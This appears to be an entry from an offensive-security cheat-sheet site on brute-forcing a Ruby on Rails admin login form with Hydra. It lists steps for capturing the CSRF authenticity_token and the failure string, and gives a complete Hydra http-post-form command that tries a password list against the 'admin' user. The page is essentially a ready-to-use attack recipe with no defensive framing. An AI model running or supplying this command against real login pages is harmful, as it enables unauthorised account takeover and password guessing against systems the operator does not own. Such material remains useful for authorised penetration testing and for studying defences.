← Back to search

Rails Login Brute Force (Hydra)

credentialstool

Summary

Brute-forces a Rails login form with Hydra; the CSRF authenticity_token must be captured and supplied, and F= marks the failure string.

Walkthrough

Use Hydra against a Ruby on Rails login form when you have a candidate username and a password list.

Steps

  • Capture a valid authenticity_token (CSRF token) from the login page and substitute it into the request.
  • Identify the failure string returned on a bad login (here Invalid) and pass it with F=.
  • Run the attack with -l for a fixed user and -P for the password list.

Commands

bash

hydra -l admin -P passwords.txt <TARGET> http-post-form "/admin/login:authenticity_token=TOKEN&user[username]=^USER^&user[password]=^PASS^:F=Invalid"